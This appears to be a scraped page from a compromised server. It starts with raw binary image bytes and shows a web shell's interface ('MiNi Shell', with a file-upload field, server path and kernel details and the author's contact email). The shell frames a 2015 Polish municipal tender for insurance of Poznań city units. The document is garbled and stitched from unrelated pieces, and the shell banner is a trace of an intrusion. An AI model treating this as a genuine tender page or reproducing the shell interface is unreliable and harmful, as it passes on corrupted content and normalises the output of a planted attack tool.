JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151126/320520-N-2015.html

<p class="kh_header"><b>Poznań: ubezpieczenie majątku oraz odpowiedzialności cywilnej 
jednostek organizacyjnych Miasta Poznania</b><br>
<b>Numer ogłoszenia: 320520 - 2015; data zamieszczenia: 26.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Poznań , Plac Kolegiacki 17, 61-841 Poznań, woj. wielkopolskie, tel. 61 8785210, faks 61 878 50 85.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.um.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ubezpieczenie majątku oraz odpowiedzialności cywilnej 
jednostek organizacyjnych Miasta Poznania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I:
Ubezpieczenie majątku Miasta Poznania przekazanego w zarząd:
- Miejskiemu Ośrodkowi Pomocy Rodzinie, 
- Miejskiemu Centrum Interwencji Kryzysowej, 
- Ośrodkowi dla Bezdomnych nr 1, 
- Zespołowi Dziennych Domów Pomocy Społecznej, 
- Domowi Pomocy Społecznej ul. Bukowska 27/29, 
- Domowi Pomocy Społecznej ul. Konarskiego 11/13, 
- Domowi Pomocy Społecznej im. bł. Edmunda Bojanowskiego ul. Niedziałkowskiego 22, 
- Domowi Pomocy Społecznej ul. Ugory 18/20, 
- Dziennemu Ośrodkowi Adaptacyjnemu nr 1, 
- Centrum Inicjatyw Senioralnych 
oraz odpowiedzialności cywilnej w zakresie:
a)	ryzyk podstawowych:
- ubezpieczenie mienia od ognia i innych zdarzeń losowych,
- ubezpieczenie mienia od kradzieży z włamaniem i rabunku,
- ubezpieczenie szyb i innych przedmiotów od stłuczenia,
- ubezpieczenie sprzętu elektronicznego,
- ubezpieczenie odpowiedzialności cywilnej,
- ubezpieczeń komunikacyjnych,

b)	ryzyk dodatkowych przyjętych i zaakceptowanych przez Wykonawcę na warunkach określonych przez Zamawiającego w załączniku nr 1 do umowy, stanowiącym  zał. nr 6A do SIWZ,  - zgodnie z ofertą Wykonawcy.

Część II
Ubezpieczenie majątku Miasta Poznania przekazanego w zarząd:
- Ogrodowi Zoologicznemu, 
- Palmiarni Poznańskiej, 
- Lasom Poznańskim, 
- Zarządowi Zieleni Miejskiej,
- Usługom Komunalnym  
oraz odpowiedzialności cywilnej w zakresie:
a) ryzyk podstawowych:
- ubezpieczenie mienia od ognia i innych zdarzeń losowych,
- ubezpieczenie mienia od kradzieży z włamaniem i rabunku,
- ubezpieczenie szyb i innych przedmiotów od stłuczenia,
- ubezpieczenie sprzętu elektronicznego,
- ubezpieczenie odpowiedzialności cywilnej,
- ubezpieczeń komunikacyjnych.

b) ryzyk dodatkowych przyjętych i zaakceptowanych przez Wykonawcę na warunkach
określonych przez Zamawiającego w załączniku nr 1 do umowy, stanowiącym           zał. nr 6B do SIWZ, - zgodnie z ofertą Wykonawcy.

Zamawiający dopuszcza możliwość składania ofert częściowych. 
Każdy Wykonawca może złożyć ofertę na jedną bądź dwie części zamówienia wymienione powyżej.

Szczegółowy zakres przedmiotu zamówienia określony został przez Zamawiającego    w następujących dokumentach:
a)	Szczególne warunki ubezpieczenia wymagane przez Zamawiającego dla części I zamówienia - załącznik nr 2 do umowy, stanowiącej zał. nr 6A do SIWZ;
b)	Szczególne warunki ubezpieczenia wymagane przez Zamawiającego dla części II zamówienia - załącznik nr 2 do umowy, stanowiącej zał. nr 6B do SIWZ;
c)	Wyszczególnienie zakresu rzeczowego i podmiotowego przedmiotu zamówienia  dla części I zamówienia - załącznik nr 5 do umowy, stanowiącej zał. nr 6A              do SIWZ
d)	Wyszczególnienie zakresu rzeczowego i podmiotowego przedmiotu zamówienia               dla części I zamówienia - załącznik nr 5 do umowy, stanowiącej zał. nr 6B                  do SIWZ
e)	Wykaz jednostek wraz z podaniem ich okresu ubezpieczenia dla części I postępowania - załącznik nr 8 A do SIWZ;
f)	Wykaz jednostek wraz z podaniem ich okresu ubezpieczenia dla części II postępowania - załącznik nr 8 B do SIWZ;
g)	Zakres ryzyk dodatkowych polegających punktacji wraz z podaniem wag dla części I postępowania - załącznik nr 7A do SIWZ;
h)	Zakres ryzyk dodatkowych polegających punktacji wraz z podaniem wag dla części II postępowania - załącznik nr 7B do SIWZ;
Zapisy wspólne przedmiotu zamówienia dla obu części:
i)	Tryb obsługi roszczeń odbywać się będzie zgodnie z procedurami opisanymi      w załączniku Tryb obsługi roszczeń ubezpieczeniowych, stanowiącym załącznik       nr 9 do umowy
j)	Zamawiający wymaga, by likwidator/koordynator likwidacji szkód miał siedzibę lub oddział w Poznaniu. 

Szczegółowy opis warunków realizacji przedmiotu zamówienia zawarty jest we wzorze umowy stanowiącym załącznik nr 6A ( dot. cz. I) i załącznik nr 6B ( dot. części II)     do SIWZ.
Przed podpisaniem umowy Wykonawca wybrany w postępowaniu dla danej części zobowiązany jest dostarczyć Ogólne Warunki  Ubezpieczeń (OWU), które będą stanowić załącznik nr 3 do umowy. 
W ciągu 2 tygodni od podpisania umowy Wykonawca zobowiązany jest do przedstawienia w formie pisemnej różnic między  postanowieniami umowy a OWU. Informacja ta stanowić będzie załącznik nr 4 do umowy. 
Rozliczenie składki na miejskie jednostki organizacyjne (odpowiedni załącznik nr 7       do umowy)  oraz Wykaz osób odpowiedzialnych za nadzór nad realizacją umowy        ze strony Zamawiającego (załącznik nr 8 do umowy) sporządzone zostaną przy podpisaniu umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielania zamówień uzupełniających do przedmiotowego zamówienia na podstawie art. 67 ust. 1 pkt. 6 ustawy w wysokości  
nieprzekraczającej 30% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże posiadanie uprawnień 
do wykonywania określonej działalności lub czynności zgodnie z Ustawą z dnia 22 maja 2003 roku o działalności  ubezpieczeniowej - zezwolenie Komisji Nadzoru Finansowego (wcześniej: Zezwolenie Komisji Nadzoru  
  Ubezpieczeń i Funduszy Emerytalnych), bądź Ministra Finansów, jeżeli uzyskali 
  zezwolenie przed 1 stycznia 2004 r., lub Potwierdzenie Komisji Nadzoru Ubezpieczeń 
  i Funduszy Emerytalnych o posiadaniu uprawnień do prowadzenia działalności  
  ubezpieczeniowej jeżeli rozpoczęli działalności przed 28 sierpnia 1990 r. lub inny
  dokument - zezwolenie właściwego organu na wykonywanie działalności 
  ubezpieczeniowej w państwie członkowskim Unii Europejskiej, w którym ten zakład 
  ma siedzibę, potwierdzający posiadanie uprawnień do prowadzenia działalności 
  ubezpieczeniowej, w zakresie wszystkich grup ryzyk objętych przedmiotem 
  zamówienia (Ustawa z dnia 22 maja 2003 roku o działalności  ubezpieczeniowej).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Odpowiednio wypełniony i podpisany Formularz ofertowy - załącznik nr 1 do SIWZ.
2)	Wypełniony i podpisany Formularz cenowy - załącznik nr 6 do wzoru umowy, stanowiącej zał. nr 6A do SIWZ-  w przypadku składania oferty do cz. I
3)	Wypełniony i podpisany Formularz cenowy - załącznik nr 6 do wzoru umowy, stanowiącej zał. nr 6B do SIWZ-  w przypadku składania oferty do cz. II
4)	Wypełniony i podpisany Zakres ryzyk dodatkowych podlegających ocenie przez Zamawiającego - załącznik nr 1 do wzoru umowy, stanowiącej zał. nr 6A               do SIWZ - w przypadku składania oferty do cz. I
5)	Wypełniony i podpisany Zakres ryzyk dodatkowych podlegających ocenie przez Zamawiającego - załącznik nr 1 do wzoru umowy, stanowiącej zał. nr 6B do SIWZ - w przypadku składania oferty do cz. II
6)	Jeżeli zasady reprezentacji nie wynikają jednoznacznie z przedłożonych wypisów (odpisów), wymaga się złożenia dokumentu (w formie oryginału lub potwierdzonej notarialnie kopii - dotyczy wyłącznie pełnomocnictwa) wskazującego osobę uprawnioną do reprezentowania Wykonawcy.
Podmioty występujące wspólnie muszą ustanowić pełnomocnika zgodnie z zasadami 
art. 23 ust. 2 ustawy.

Dodatkowo:
Jeżeli Wykonawca zastrzega niejawność informacji stanowiących treść oferty, 
na podstawie art. 8 ust. 3 ustawy zobowiązany jest załączyć do oferty wypełniony 
i podpisany załącznik nr 5 do SIWZ oraz wykazać, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu ustawy o zwalczaniu nieuczciwej konkurencji. Dokumenty, których treść stanowi tajemnicę przedsiębiorstwa należy zabezpieczyć w sposób uniemożliwiający bezpośrednie odczytanie treści, np. poprzez zastosowanie nieprzejrzystej folii.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Zakres ryzyk dodatkowych podlegających ocenie - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z art. 144 ust. 1 ustawy Prawo Zamówień Publicznych, Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy, 
w następujących przypadkach:
a)	zmiany dotyczące: terminów płatności, wysokości składki (w sytuacji zmian wartości majątku Zamawiającego) oraz liczby rat składki,
b)	korzystne dla Zamawiającego zmiany zakresu ubezpieczenia, które wynikać będą 
ze zmian ogólnych warunków ubezpieczenia Wykonawcy
c)	zmiany dotyczące płatników składek (miejskich jednostek organizacyjnych) 
w przypadku zmian organizacyjnych.
2.	Zmiany organizacyjne stron np. zmiana reprezentacji, adresu siedziby firmy, zmiana osób do kontaktu nie stanowią istotnych zmian umowy i nie wymagają aneksu -                do ich skuteczności wystarczy zachowanie formy pisemnej. 
3.	Zamawiający przewiduje przeprowadzenie z Wykonawcą negocjacji w przedmiocie podwyższenia lub obniżenia wynagrodzenia ze względu na zmianę wysokości: 
a)	 stawki podatku od towarów i usług, 
b)	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art.2 ust.3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu                 za pracę,
c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne. 
4.	Negocjacje o których mowa w ust.3 bedą przeprowadzone:
a)	w przypadku zmiany, o której mowa w ust.3 pkt.a) zarówno z inicjatywy Zamawiającego jak i na wniosek Wykonawcy,
b)	w przypadku zmian, o których mowa w ust.3 pkt.b) i c) wyłącznie na pisemny wniosek wykonawcy
5.	W przypadku zmiany, o której mowa w ust.3 pkt. a podwyższenie lub obniżenie wynagrodzenia następuje jedynie w zakresie wartości należnego podatku od towaru              i usług, Negocjacje nie będą obejmować zmiany ceny stanowiącej podstawę ustalenia wymiaru podatku od towaru i usług, 
6.	W przypadku zmian, o których mowa w ust.3 pkt.b) i c) wykonawca zobowiązany jest do załączenia do wniosku, o którym mowa w ust.4 następujących dokumentów:
a)	analizy wpływu zmian, o których mowa w ust.3 pkt.b) i c) na koszty realizowanego zamówienia wraz z strukturą ponoszonych kosztów, 
b)	struktury zatrudnienia z podaniem stanowisk pracy oraz wysokości zarobków                z wyłączeniem danych osobowych pracowników. 
7.	W przypadku uwzględnienia wniosku wynagrodzenie Wykonawcy zostanie przeliczone proporcjonalnie do wzrostu tych kosztów
8.	Wykonawca zobowiązany jest do niezwłocznego informowania Zamawiającego                 o każdej zmianie adresu siedziby i o każdej innej zmianie w działalności Wykonawcy mogącej mieć wpływ na realizację umowy, w tym także o zmianie osób o kontaktu wymienionych w załączniku nr 8 do umowy. W przypadku niedopełnienia tego obowiązku Wykonawca będzie obciążony wszystkimi kosztami, jakie poniósł Zamawiający w wyniku niniejszego zaniechania z uwzględnieniem kwot utraconego odszkodowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Poznania, Wydział Zamówień i Obsługi Urzędu, pl. Kolegiacki 17, 61-841 Poznań pok. 155.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2015 godzina 10:00, miejsce: Urząd Miasta Poznania, Wydział Zamówień i Obsługi Urzędu, pl. Kolegiacki 17, 61-841 Poznań pok. 152.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ubezpieczenie majątku i OC Miasta Poznania przekazanego w zarząd poniżej wymienionym miejskim jednostkom organizacyjnym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I:
Ubezpieczenie majątku Miasta Poznania przekazanego w zarząd:
- Miejskiemu Ośrodkowi Pomocy Rodzinie, 
- Miejskiemu Centrum Interwencji Kryzysowej, 
- Ośrodkowi dla Bezdomnych nr 1, 
- Zespołowi Dziennych Domów Pomocy Społecznej, 
- Domowi Pomocy Społecznej ul. Bukowska 27/29, 
- Domowi Pomocy Społecznej ul. Konarskiego 11/13, 
- Domowi Pomocy Społecznej im. bł. Edmunda Bojanowskiego ul. Niedziałkowskiego 22, 
- Domowi Pomocy Społecznej ul. Ugory 18/20, 
- Dziennemu Ośrodkowi Adaptacyjnemu nr 1, 
- Centrum Inicjatyw Senioralnych 
oraz odpowiedzialności cywilnej w zakresie:
a)	ryzyk podstawowych:
- ubezpieczenie mienia od ognia i innych zdarzeń losowych,
- ubezpieczenie mienia od kradzieży z włamaniem i rabunku,
- ubezpieczenie szyb i innych przedmiotów od stłuczenia,
- ubezpieczenie sprzętu elektronicznego,
- ubezpieczenie odpowiedzialności cywilnej,
- ubezpieczeń komunikacyjnych,

b)	ryzyk dodatkowych przyjętych i zaakceptowanych przez Wykonawcę na warunkach określonych przez Zamawiającego w załączniku nr 1 do umowy, stanowiącym zał. nr 6A do SIWZ,  - zgodnie z ofertą Wykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Zakres ryzyk dodatkowych podlegających ocenie - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ubezpieczenie majątku i OC Miasta Poznania przekazanego w zarząd poniżej wymienionym miejskim jednostkom organizacyjnym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II
Ubezpieczenie majątku Miasta Poznania przekazanego w zarząd:
- Ogrodowi Zoologicznemu, 
- Palmiarni Poznańskiej, 
- Lasom Poznańskim, 
- Zarządowi Zieleni Miejskiej,
- Usługom Komunalnym  
oraz odpowiedzialności cywilnej w zakresie:
a) ryzyk podstawowych:
- ubezpieczenie mienia od ognia i innych zdarzeń losowych,
- ubezpieczenie mienia od kradzieży z włamaniem i rabunku,
- ubezpieczenie szyb i innych przedmiotów od stłuczenia,
- ubezpieczenie sprzętu elektronicznego,
- ubezpieczenie odpowiedzialności cywilnej,
- ubezpieczeń komunikacyjnych.

b) ryzyk dodatkowych przyjętych i zaakceptowanych przez Wykonawcę na warunkach
określonych przez Zamawiającego w załączniku nr 1 do umowy, stanowiącym           zał. nr 6B do SIWZ, - zgodnie z ofertą Wykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Zakres ryzyk dodatkowych podlegających ocenie - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com